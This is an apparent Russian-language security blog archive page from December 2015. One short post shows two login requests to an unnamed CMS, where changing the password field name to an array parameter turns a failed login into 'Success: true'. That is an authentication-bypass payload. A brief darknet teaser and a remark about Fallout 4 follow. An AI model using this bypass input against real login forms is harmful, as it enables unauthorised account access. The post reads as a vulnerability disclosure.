Your security is bad and you should feel bad!

security, безопасность, уязвимость, xss, sql-inj

Monthly Archives: Декабрь 2015

Чего только не бывает

В одной из CMS нашел интересное. При авторизации

data[0][name]=email&data[0][value]=admin@email.tld&data[1][name]=password&data[1][value]=bla-bla-bla&data[2][name]=remember&data[2][value]=1

Success: false

А при

data[0][name]=email&data[0][value]=admin@email.tld&data[1][name][]=password&data[1][value]=bla-bla-bla&data[2][name]=remember&data[2][value]=1

Success: true

О как бывает.

Продолжение даркнетовских историй

Тем временем в даркнете.

anthill2amberoad_min

 

PS: Что-то меня совсем Fallout4  захватил.